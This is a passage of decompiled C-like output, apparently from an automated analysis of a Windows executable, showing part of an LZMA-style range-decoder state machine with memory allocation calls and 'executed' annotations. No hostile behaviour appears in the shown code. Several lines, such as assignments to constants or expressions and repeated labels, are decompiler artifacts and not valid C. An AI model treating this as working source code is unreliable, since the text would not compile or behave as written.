                                                                                                                                                                                      												_pop(_t570);
                                                                                                                                                                                      												_push(9);
                                                                                                                                                                                      												_pop(_t571);
                                                                                                                                                                                      												_t609 = _t538 / _t570;
                                                                                                                                                                                      												_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                                                                                      												asm("cdq");
                                                                                                                                                                                      												_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                                                                                      												 *(_t613 - 0x3c) = _t604;
                                                                                                                                                                                      												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                                                                                      												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                                                                                      												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                                                                                      												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                                                                                      													L10:
                                                                                                                                                                                      													if(_t612 == 0) {
                                                                                                                                                                                      														L12:
                                                                                                                                                                                      														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                                                                                      														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                      														goto L15;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														goto L11;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													do {
                                                                                                                                                                                      														L11:
                                                                                                                                                                                      														_t612 = _t612 - 1;
                                                                                                                                                                                      														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                                                                                      													} while (_t612 != 0);
                                                                                                                                                                                      													goto L12;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												if( *(_t613 - 4) != 0) {
                                                                                                                                                                                      													GlobalFree( *(_t613 - 4));
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                      												 *(_t613 - 4) = _t534;
                                                                                                                                                                                      												if(_t534 == 0) {
                                                                                                                                                                                      													goto L171;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                                                                                      													goto L10;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 1:
                                                                                                                                                                                      												L13:
                                                                                                                                                                                      												__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                      												if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                      													 *(_t613 - 0x88) = 1;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                                                                                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                      												_t45 = _t613 - 0x48;
                                                                                                                                                                                      												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                                                                                      												__eflags =  *_t45;
                                                                                                                                                                                      												L15:
                                                                                                                                                                                      												if( *(_t613 - 0x48) < 4) {
                                                                                                                                                                                      													goto L13;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t546 =  *(_t613 - 0x40);
                                                                                                                                                                                      												if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                                                                                      													L20:
                                                                                                                                                                                      													 *(_t613 - 0x48) = 5;
                                                                                                                                                                                      													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                      													goto L23;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												 *(_t613 - 0x74) = _t546;
                                                                                                                                                                                      												if( *(_t613 - 8) != 0) {
                                                                                                                                                                                      													GlobalFree( *(_t613 - 8));
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                                                                                      												 *(_t613 - 8) = _t534;
                                                                                                                                                                                      												if(_t534 == 0) {
                                                                                                                                                                                      													goto L171;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L20;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 2:
                                                                                                                                                                                      												L24:
                                                                                                                                                                                      												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                                                                                      												 *(_t613 - 0x84) = 6;
                                                                                                                                                                                      												 *(_t613 - 0x4c) = _t553;
                                                                                                                                                                                      												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                                                      												L132:
                                                                                                                                                                                      												 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                      												goto L133;
                                                                                                                                                                                      											case 3:
                                                                                                                                                                                      												L21:
                                                                                                                                                                                      												__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                      												if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                      													 *(_t613 - 0x88) = 3;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                      												_t67 = _t613 - 0x70;
                                                                                                                                                                                      												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                      												__eflags =  *_t67;
                                                                                                                                                                                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												L23:
                                                                                                                                                                                      												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                                                                                      												if( *(_t613 - 0x48) != 0) {
                                                                                                                                                                                      													goto L21;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												goto L24;
                                                                                                                                                                                      											case 4:
                                                                                                                                                                                      												L133:
                                                                                                                                                                                      												_t531 =  *_t606;
                                                                                                                                                                                      												_t589 = _t531 & 0x0000ffff;
                                                                                                                                                                                      												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                                      												if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                                      													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                                      													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                                      													 *(_t613 - 0x40) = 1;
                                                                                                                                                                                      													_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                      													 *_t606 = _t532;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *(_t613 - 0x10) = _t565;
                                                                                                                                                                                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                      													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                                      													goto L139;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 5:
                                                                                                                                                                                      												goto L137;
                                                                                                                                                                                      											case 6:
                                                                                                                                                                                      												__edx = 0;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      													__eax =  *(__ebp - 4);
                                                                                                                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      													 *(__ebp - 0x34) = 1;
                                                                                                                                                                                      													 *(__ebp - 0x84) = 7;
                                                                                                                                                                                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      													while(1) {
                                                                                                                                                                                      														L132:
                                                                                                                                                                                      														 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                      														goto L133;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                      												__esi =  *(__ebp - 0x60);
                                                                                                                                                                                      												__cl = 8;
                                                                                                                                                                                      												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                      												__ecx =  *(__ebp - 4);
                                                                                                                                                                                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                      												if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                      													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                      													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                      														_t98 = __ebp - 0x38;
                                                                                                                                                                                      														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                      														__eflags =  *_t98;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *(__ebp - 0x38) = 0;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                      												if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                      													__ebx = 0;
                                                                                                                                                                                      													__ebx = 1;
                                                                                                                                                                                      													goto L61;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                      													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                      													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                      														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                      														__eflags = __eax;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__ecx =  *(__ebp - 8);
                                                                                                                                                                                      													__ebx = 0;
                                                                                                                                                                                      													__ebx = 1;
                                                                                                                                                                                      													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                      													goto L41;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 7:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                      												if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                      													__eax =  *(__ebp - 0x24);
                                                                                                                                                                                      													 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                      													__eax =  *(__ebp - 0x28);
                                                                                                                                                                                      													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                      													__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                      													__eax = 0;
                                                                                                                                                                                      													__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                      													__al = __al & 0x000000fd;
                                                                                                                                                                                      													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                      													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                      													__eax =  *(__ebp - 4);
                                                                                                                                                                                      													__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      													 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      													goto L69;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      												 *(__ebp - 0x84) = 8;
                                                                                                                                                                                      												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                      													L132:
                                                                                                                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                      													goto L133;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 8:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      													__eax =  *(__ebp - 4);
                                                                                                                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      													 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													__eax =  *(__ebp - 0x38);
                                                                                                                                                                                      													__ecx =  *(__ebp - 4);
                                                                                                                                                                                      													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                                      													 *(__ebp - 0x84) = 9;
                                                                                                                                                                                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                      													L132:
                                                                                                                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                      													goto L133;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 9:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      													goto L89;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                      												if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                      													goto L171;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eax = 0;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                      												__eflags = _t259;
                                                                                                                                                                                      												0 | _t259 = _t259 + _t259 + 9;
                                                                                                                                                                                      												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                                                                                      												goto L76;
                                                                                                                                                                                      											case 0xa:
                                                                                                                                                                                      												goto L0;
                                                                                                                                                                                      											case 0xb:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      													__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                      													__eax =  *(__ebp - 0x20);
                                                                                                                                                                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													__eax =  *(__ebp - 0x24);
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                      												goto L88;
                                                                                                                                                                                      											case 0xc:
                                                                                                                                                                                      												L99:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      													 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												_t334 = __ebp - 0x70;
                                                                                                                                                                                      												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      												__eflags =  *_t334;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      												goto L101;
                                                                                                                                                                                      											case 0xd:
                                                                                                                                                                                      												L37:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      													 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												_t122 = __ebp - 0x70;
                                                                                                                                                                                      												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      												__eflags =  *_t122;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												L39:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                      													goto L48;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags = __ebx - 0x100;
                                                                                                                                                                                      												if(__ebx >= 0x100) {
                                                                                                                                                                                      													goto L54;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												L41:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                      												 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                      												__eax = __eax + 1;
                                                                                                                                                                                      												__eax = __eax << 8;
                                                                                                                                                                                      												__eax = __eax + __ebx;
                                                                                                                                                                                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      												__ax =  *__esi;
                                                                                                                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      												__edx = __ax & 0x0000ffff;
                                                                                                                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      													__cx = __ax;
                                                                                                                                                                                      													 *(__ebp - 0x40) = 1;
                                                                                                                                                                                      													__cx = __ax >> 5;
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      													__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                      													 *__esi = __ax;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      													0x800 = 0x800 - __edx;
                                                                                                                                                                                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                      													__ebx = __ebx + __ebx;
                                                                                                                                                                                      													 *__esi = __cx;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      													goto L39;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L37;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 0xe:
                                                                                                                                                                                      												L46:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      													 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												_t156 = __ebp - 0x70;
                                                                                                                                                                                      												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      												__eflags =  *_t156;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                      													L48:
                                                                                                                                                                                      													__eflags = __ebx - 0x100;
                                                                                                                                                                                      													if(__ebx >= 0x100) {
                                                                                                                                                                                      														break;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      													__edx = __ebx + __ebx;
                                                                                                                                                                                      													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      													__esi = __edx + __eax;
                                                                                                                                                                                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      													__ax =  *__esi;
                                                                                                                                                                                      													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      													__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      														__cx = __ax;
                                                                                                                                                                                      														_t170 = __edx + 1; // 0x1
                                                                                                                                                                                      														__ebx = _t170;
                                                                                                                                                                                      														__cx = __ax >> 5;
                                                                                                                                                                                      														__eflags = __eax;
                                                                                                                                                                                      														 *__esi = __ax;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      														0x800 = 0x800 - __edi;
                                                                                                                                                                                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      														__ebx = __ebx + __ebx;
                                                                                                                                                                                      														 *__esi = __cx;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      														continue;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														goto L46;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												L54:
                                                                                                                                                                                      												_t173 = __ebp - 0x34;
                                                                                                                                                                                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                      												__eflags =  *_t173;
                                                                                                                                                                                      												goto L55;
                                                                                                                                                                                      											case 0xf:
                                                                                                                                                                                      												L58:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      													 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												_t203 = __ebp - 0x70;
                                                                                                                                                                                      												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      												__eflags =  *_t203;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												L60:
                                                                                                                                                                                      												__eflags = __ebx - 0x100;
                                                                                                                                                                                      												if(__ebx >= 0x100) {
                                                                                                                                                                                      													L55:
                                                                                                                                                                                      													__al =  *(__ebp - 0x44);
                                                                                                                                                                                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                      													goto L56;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												L61:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      												__edx = __ebx + __ebx;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      												__esi = __edx + __eax;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      												__ax =  *__esi;
                                                                                                                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      													__cx = __ax;
                                                                                                                                                                                      													_t217 = __edx + 1; // 0x1
                                                                                                                                                                                      													__ebx = _t217;
                                                                                                                                                                                      													__cx = __ax >> 5;
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      													 *__esi = __ax;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      													0x800 = 0x800 - __edi;
                                                                                                                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      													__ebx = __ebx + __ebx;
                                                                                                                                                                                      													 *__esi = __cx;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      													goto L60;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L58;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 0x10:
                                                                                                                                                                                      												L109:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      													 *(__ebp - 0x88) = 0x10;
